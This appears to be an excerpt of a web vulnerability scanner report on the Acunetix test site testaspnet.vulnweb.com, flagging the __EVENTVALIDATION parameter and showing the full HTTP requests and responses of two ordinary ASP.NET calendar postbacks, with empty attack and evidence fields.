Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8198&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAXn4GTNoIZGRkAKEOKZ1gcFOkA%2FjMDP2OOoFmblM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKrm5OMAwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9H3Rf01sWOCmPgktzzu2RgUNVj9w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:10 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAXn4GTNoIZGRkAKEOKZ1gcFOkA/jMDP2OOoFmblM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKrm5OMAwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9H3Rf01sWOCmPgktzzu2RgUNVj9w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:White" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8406&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDASvR479oIZGRkFDlPgi6FqDJovTXGGYRkjhBRwkI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKrmtCUBgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVNbdb%2B6knxrKgOsLLYreivZFQY9A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:09 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDASvR479oIZGRkFDlPgi6FqDJovTXGGYRkjhBRwkI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKrmtCUBgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVNbdb+6knxrKgOsLLYreivZFQY9A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:White" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
